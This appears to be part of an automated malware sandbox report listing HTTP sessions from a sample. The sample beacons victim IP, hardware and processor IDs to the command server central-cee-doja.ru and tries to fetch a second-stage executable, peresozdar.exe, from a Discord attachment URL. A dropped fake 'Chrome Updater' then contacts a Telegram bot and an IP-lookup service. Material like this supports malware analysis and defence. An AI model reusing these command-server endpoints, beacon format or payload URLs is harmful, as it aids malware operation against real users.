                                                                                    Data Ascii: '?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.649740104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:18 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:19 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBlURtiszJ1RtlM9A3SG2oSUGr%2BgpGO2k%2BC0ynVKQmopyaeG4c1IrhiQ8j22DSYGVR74SZs4ALJ9lirpX4tmts4Rz%2FwwB9o1eEQrbW30xXgKlCA447zDFHHX0hEer5dihBYUVZUE"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c684ce403b74-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:19 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.649741104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:19 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:20 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IXA%2F%2FooGlNT09vABpvadwZAyJi1TQCvVaZGCRsQWf0%2BBpsBjCFUB89Wu04tF3ejICaS30riZJw%2B8s2WsBRTMiGbzKgN4Y3xQiXicGhnTPY2LiAN%2FkXVrtpig7rYe1aQSIVCDKSQF"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c68a7d64596d-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:20 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.649742162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:20 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:20 UTC1323INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:20 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c68ffdcc72ed-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:20 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzI
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=8R1i7rl7XTZevmokKczqvjP9rWOjxh3t39jgDarvM90-1704353420-1-ASi25i0pTKXfA6vrjw185aaiEnn05smv60zrL+/RvPG5P6hlCiXFDYBOA5RamS8qGt/iB92zvwVAXymTF4NYP6Y=; path=/; expires=Thu, 04-Jan-24 08:00:20 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fOI1dDr7hCLj%2FLwHodfs865tJIIKlpcaYL6WmxzGNutbODxHLtavQqawYIv3d%2BFwEKouzzc19ykVdjJytTbSYqw1JdzkNapdAcfUvuaCOEfijx3BX6O53bKsF7Efne77Pbp2ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=GLQnn5ovu.FaTg8UVLGGZcg8og9E8dchyIwI2NkovMk-1704353420848-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:20 UTC46INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><
                                                                                    2024-01-04 07:30:20 UTC190INData Raw: 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.649743104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:21 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:21 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nSF7OwwMghtCZyQHHveWE54vt5JtTECjf%2FYraxrg1CCz4qRykxZwGjTMVl%2FRMbeEkRx6%2FnxCsQw4FmLTpXwb7KN2dne13RjKrAuCI12roSWGpeFXlCz0IbZTSKUXXjzzrw0BK3rc"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c693a98a208a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:21 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.649744104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:22 UTC86OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:22 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K6rwKkz%2F2%2BxhQ701o%2BARzQ9zYcaIbMWOWaLF5BWBu7ByR%2Bl2BR3jlH0b4%2BoqrnHL4zegENaYecsuSkTy8oOl79PnFDW%2BdOAaSdALjx%2FO92JFmUj64gTdLeV2u8LiniADdkkfSx2o"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6996b2c5710-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:22 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.649745162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:22 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:23 UTC1334INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:23 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c69dbd533b68-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 7
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:23 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=enMO48Rp7vtzwOUWkWSvWvwYmhZxdCBglZCkgmVhSSw-1704353423-1-AacB92qBb9+8EQLvwWdSYhDqpN94TJ9jLkK/OaPvo5ABbklU5yCPTSky1+MlJyQaKlqbjV2+vCwcg+SEMBKpEjQ=; path=/; expires=Thu, 04-Jan-24 08:00:23 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VSkHwqbStwgw6bFnEPFdo0amBv1o%2B6HOUDo5nDjCaHGIZv%2BGGCiY6MtIko%2BUGEWMEkZDTMcNMBVKCmmKVDNLXyz2Cse6e0dYrFklKh2laezw%2FyWF7QYCkoujFbUdcfA5NWQfDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=fOPCYBl8g.Trn_ZtDhvwMnAv6.4_DrbhbDkkiNECP1g-1704353423018-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:23 UTC35INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8
                                                                                    2024-01-04 07:30:23 UTC201INData Raw: 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: '?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.649746104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:23 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:23 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JlwLQthGNcJ6%2Bv6NjBgzDBV8Buammn1RpvTGfAIqvT2Coyfsl2Kv1ZqtPn6SnLUxqe37KZwOJoxb8kBpgWKyGtXAquJDOIRzEMm%2B%2FQxatNamRPugDRJhZaBS4Tq6qB%2F4f8PoLUHl"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6a13d210790-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:23 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.649748104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:24 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:24 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KAHtuzFyY%2BxT4r0ltel9uUTlWniqJqQvsXeW%2B%2FcRYZaZ%2BTjgocFvsV4L4sG9nV6E%2Bwsu1i3PXdO7YbqlcICWL89frYQquDxAOqWR1QJgUKVx5Nh%2F9xkWL7iOxUdOSkAOwCW0yTp8"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6a59d9339af-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:24 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.649749162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:24 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:25 UTC1325INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:25 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6a9efd739b6-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:25 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=.FmwXUKmi3YnE1mN0xt3ElPU.NYjLu62W1KPM084Mf0-1704353425-1-Ac1ucnwKDr0foQ9r/nBgnGoxAbew/MjXoYX44J1Qcjxh8TjVVQFuLbYdZjbSp6Ahb93u3Vg/aI4h1h6g5EFBOLY=; path=/; expires=Thu, 04-Jan-24 08:00:25 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IpGBmmo9daNtDEf%2F12JE46bkbZcqlEXRv7GSpAJ2wrtVmEwWnAaYkUTquFA9csNP9USl5CJHhaKHw%2FpWrcHKFSjYBwurebxqa0Levf0sALPbY0%2FZnnypNcgtqmRoEdwgKslaTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=xq2O3k8Q9payNiKToT4_DTsOzyUnsiZ3IUyAVrszRC4-1704353425004-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:25 UTC44INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error
                                                                                    2024-01-04 07:30:25 UTC192INData Raw: 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.649752104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:25 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:25 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jmniNaOMHL3gDPXZ8efXeMGQw2DvSRjI%2FC%2FJITDuCziT7lJ3Vtdptgb0EtV7SkphXOd4yhdYRUcZ5M0EwrV4hvcqsRnjI5c1e889VGifgZnn9G2WyeLVTyYlKNbmybOEDROJMDG3"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6adafee7fdc-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:25 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.649751149.154.167.9944327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:25 UTC64OUTGET /cinoshibot HTTP/1.1
                                                                                    Host: t.me
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:25 UTC511INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 04 Jan 2024 07:30:25 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 10855
                                                                                    Connection: close
                                                                                    Set-Cookie: stel_ssid=efae6267672f998052_9614676147029508104; expires=Fri, 05 Jan 2024 07:30:25 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                    Pragma: no-cache
                                                                                    Cache-control: no-store
                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                    2024-01-04 07:30:25 UTC10855INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 69 6e 6f 73 68 69 62 6f 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @cinoshibot</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.64975315.204.213.544327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:26 UTC69OUTGET /?output=xml HTTP/1.1
                                                                                    Host: ipwho.is
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:26 UTC207INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:26 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Server: ipwhois
                                                                                    Access-Control-Allow-Headers: *
                                                                                    X-Robots-Tag: noindex
